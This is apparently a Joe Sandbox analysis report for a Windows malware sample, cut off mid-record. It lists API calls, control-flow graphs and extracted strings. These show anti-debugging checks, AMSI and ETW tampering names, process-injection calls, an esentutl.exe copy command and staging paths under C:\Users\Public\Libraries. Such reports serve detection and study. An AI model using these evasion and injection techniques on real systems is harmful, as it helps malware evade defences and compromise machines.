2e749a0 call 2e746d4 call 2e889d8 call 2e749f8 call 2e87e58 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e8b114 2601->3372 2778 2e98519-2e986ec call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e747ec call 2e749a0 call 2e74d74 call 2e74df0 CreateProcessAsUserW 2602->2778 2779 2e9939d-2e99520 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e748ec 2602->2779 2992 2e9876a-2e98875 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 2778->2992 2993 2e986ee-2e98765 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 2778->2993 2958 2e99cf1-2e9b2f6 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 * 16 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e746d4 * 2 call 2e889d8 call 2e87c18 call 2e88340 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 ExitProcess 2779->2958 2959 2e99526-2e99535 call 2e748ec 2779->2959 2959->2958 2973 2e9953b-2e9980e call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e8f090 call 2e74860 call 2e749a0 call 2e746d4 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e77e64 2959->2973 3393 2e99aeb-2e99cec call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e749f8 call 2e88d6c 2973->3393 3394 2e99814-2e99ae6 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e8e354 call 2e74530 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74de0 * 2 call 2e74764 call 2e8dc88 2973->3394 3149 2e9887c-2e98b9c call 2e749f8 call 2e8de4c call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e8d160 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 2992->3149 3150 2e98877-2e9887a 2992->3150 2993->2992 3682 2e98b9e-2e98bb0 call 2e88738 3149->3682 3683 2e98bb5-2e99398 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 ResumeThread call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 CloseHandle call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e88088 call 2e88954 * 6 CloseHandle call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 call 2e74860 call 2e749a0 call 2e746d4 call 2e747ec call 2e749a0 call 2e746d4 call 2e889d8 3149->3683 3150->3149 3371->3372 3921 2e98105-2e9811c call 2e73700 3372->3921 3393->2958 3394->3393 3437->3436 3682->3683 3683->2779
                                  APIs
                                  • InetIsOffline.URL(00000000,00000000,02E9B780,?,?,?,00000000,00000000), ref: 02E8F7FD
                                    • Part of subcall function 02E8F6E4: GetModuleHandleW.KERNEL32(KernelBase,?,02E8FAE7,UacInitialize,02EF7380,02E9B7B4,OpenSession,02EF7380,02E9B7B4,ScanBuffer,02EF7380,02E9B7B4,ScanString,02EF7380,02E9B7B4,Initialize), ref: 02E8F6EA
                                    • Part of subcall function 02E8F6E4: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02E8F6FC
                                    • Part of subcall function 02E8F740: GetModuleHandleW.KERNEL32(KernelBase), ref: 02E8F750
                                    • Part of subcall function 02E8F740: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02E8F762
                                    • Part of subcall function 02E8F740: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02E8F779
                                    • Part of subcall function 02E77E64: GetFileAttributesA.KERNEL32(00000000,?,02E9041B,ScanString,02EF7380,02E9B7B4,OpenSession,02EF7380,02E9B7B4,ScanString,02EF7380,02E9B7B4,UacScan,02EF7380,02E9B7B4,UacInitialize), ref: 02E77E6F
                                    • Part of subcall function 02E7C36C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02FEB8B8,?,02E9074D,ScanBuffer,02EF7380,02E9B7B4,OpenSession,02EF7380,02E9B7B4,ScanBuffer,02EF7380,02E9B7B4,OpenSession), ref: 02E7C383
                                    • Part of subcall function 02E8DD6C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E8DE3C), ref: 02E8DDA7
                                    • Part of subcall function 02E8DD6C: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02E8DE3C), ref: 02E8DDD7
                                    • Part of subcall function 02E8DD6C: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02E8DDEC
                                    • Part of subcall function 02E8DD6C: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02E8DE18
                                    • Part of subcall function 02E8DD6C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02E8DE21
                                    • Part of subcall function 02E77E88: GetFileAttributesA.KERNEL32(00000000,?,02E9356B,ScanString,02EF7380,02E9B7B4,OpenSession,02EF7380,02E9B7B4,ScanBuffer,02EF7380,02E9B7B4,OpenSession,02EF7380,02E9B7B4,Initialize), ref: 02E77E93
                                    • Part of subcall function 02E78050: CreateDirectoryA.KERNEL32(00000000,00000000,?,02E93709,OpenSession,02EF7380,02E9B7B4,ScanString,02EF7380,02E9B7B4,Initialize,02EF7380,02E9B7B4,ScanString,02EF7380,02E9B7B4), ref: 02E7805D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryInetInformationName_OfflineOpenPresentQueryReadRemote
                                  • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                  • API String ID: 3690412309-2644593349
                                  • Opcode ID: 5dad43643d61d9ed85e787d2ad0c46de407401f7152ae17ad2251acc3fbf233d
                                  • Instruction ID: 1511aa25f6e532bb75fb0c1d2b329c5dbbd6a5a38d43fafa85fe8b82a174985b
                                  • Opcode Fuzzy Hash: 5dad43643d61d9ed85e787d2ad0c46de407401f7152ae17ad2251acc3fbf233d
                                  • Instruction Fuzzy Hash: 4614FC35AD015D8BDF51EB64E880ACE73B6FB85304F50E1EAE509AB254DB30AE81CF51

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 4730 2e75acc-2e75b0d GetModuleFileNameA RegOpenKeyExA 4731 2e75b4f-2e75b92 call 2e75908 RegQueryValueExA 4730->4731 4732 2e75b0f-2e75b2b RegOpenKeyExA 4730->4732 4739 2e75bb6-2e75bd0 RegCloseKey 4731->4739 4740 2e75b94-2e75bb0 RegQueryValueExA 4731->4740 4732->4731 4733 2e75b2d-2e75b49 RegOpenKeyExA 4732->4733 4733->4731 4735 2e75bd8-2e75c09 lstrcpynA GetThreadLocale GetLocaleInfoA 4733->4735 4737 2e75cf2-2e75cf9 4735->4737 4738 2e75c0f-2e75c13 4735->4738 4742 2e75c15-2e75c19 4738->4742 4743 2e75c1f-2e75c35 lstrlenA 4738->4743 4740->4739 4744 2e75bb2 4740->4744 4742->4737 4742->4743 4745 2e75c38-2e75c3b 4743->4745 4744->4739 4746 2e75c47-2e75c4f 4745->4746 4747 2e75c3d-2e75c45 4745->4747 4746->4737 4749 2e75c55-2e75c5a 4746->4749 4747->4746 4748 2e75c37 4747->4748 4748->4745 4750 2e75c84-2e75c86 4749->4750 4751 2e75c5c-2e75c82 lstrcpynA LoadLibraryExA 4749->4751 4750->4737 4752 2e75c88-2e75c8c 4750->4752 4751->4750 4752->4737 4753 2e75c8e-2e75cbe lstrcpynA LoadLibraryExA 4752->4753 4753->4737 4754 2e75cc0-2e75cf0 lstrcpynA LoadLibraryExA 4753->4754 4754->4737
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E70000,02E9E790), ref: 02E75AE8
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E70000,02E9E790), ref: 02E75B06
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E70000,02E9E790), ref: 02E75B24
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02E75B42
                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02E75BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02E75B8B
                                  • RegQueryValueExA.ADVAPI32(?,02E75D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02E75BD1,?,80000001), ref: 02E75BA9
                                  • RegCloseKey.ADVAPI32(?,02E75BD8,00000000,?,?,00000000,02E75BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E75BCB
                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02E75BE8
                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02E75BF5
                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02E75BFB
                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02E75C26
                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E75C6D
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E75C7D
                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E75CA5
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E75CB5
                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02E75CDB
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02E75CEB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                  • API String ID: 1759228003-2375825460
                                  • Opcode ID: a5f55662e749810e53b929913aeaef6cb8a2b51061e927186a993043d74fc5d6
                                  • Instruction ID: e104d246bf62e73a5c04debc78bd533073ec4a3b0d379cf182e1ed8862cca8d1
                                  • Opcode Fuzzy Hash: a5f55662e749810e53b929913aeaef6cb8a2b51061e927186a993043d74fc5d6
                                  • Instruction Fuzzy Hash: 5851A771A8035C7EFB21D6A48C46FEF77AD9B04744F8091A1BE08EA1C1EB749A449F61

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 4830 2e8f740-2e8f75a GetModuleHandleW 4831 2e8f75c-2e8f76e GetProcAddress 4830->4831 4832 2e8f786-2e8f78e 4830->4832 4831->4832 4833 2e8f770-2e8f780 CheckRemoteDebuggerPresent 4831->4833 4833->4832 4834 2e8f782 4833->4834 4834->4832
                                  APIs
                                  • GetModuleHandleW.KERNEL32(KernelBase), ref: 02E8F750
                                  • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02E8F762
                                  • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02E8F779
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                  • String ID: CheckRemoteDebuggerPresent$KernelBase
                                  • API String ID: 35162468-539270669
                                  • Opcode ID: 8e1cf832fdc8a24bfcbef0fcdef87095647a5c470804907d2216ae5741be23d0
                                  • Instruction ID: 2d16ab4ec513236ab2ea3b0d22db06ff0f4882e382c22f075ba936518f0447ea
                                  • Opcode Fuzzy Hash: 8e1cf832fdc8a24bfcbef0fcdef87095647a5c470804907d2216ae5741be23d0
                                  • Instruction Fuzzy Hash: 01F0A770994248BAFB10B7F88C8879CFBA95B0532DFA49394A47C725C1F7760684C655

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 02E74F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E74F2E
                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E8DE3C), ref: 02E8DDA7
                                  • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02E8DE3C), ref: 02E8DDD7
                                  • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02E8DDEC
                                  • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02E8DE18
                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02E8DE21
                                    • Part of subcall function 02E74C60: SysFreeString.OLEAUT32(02E8F4A0), ref: 02E74C6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                  • String ID:
                                  • API String ID: 1897104825-0
                                  • Opcode ID: 24717bbd89530d5d847e5ff9a540307847798be994c8430bf8e66d63bc739741
                                  • Instruction ID: 325c422c66455e7c28a1edda22d10b31c96be66c07465883171b4e027461e9e7
                                  • Opcode Fuzzy Hash: 24717bbd89530d5d847e5ff9a540307847798be994c8430bf8e66d63bc739741
                                  • Instruction Fuzzy Hash: 8A21C075A80209BAEB11EAE4CC52FDFB7BDEB48700F505461B604F71C0DA74AA058B94

                                  Control-flow Graph

                                  APIs
                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02E8E5F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: CheckConnectionInternet
                                  • String ID: Initialize$OpenSession$ScanBuffer
                                  • API String ID: 3847983778-3852638603
                                  • Opcode ID: 05f0f72a2ce64c2766bc44a61e5a54731eece04dbd726b30ede74037df41df27
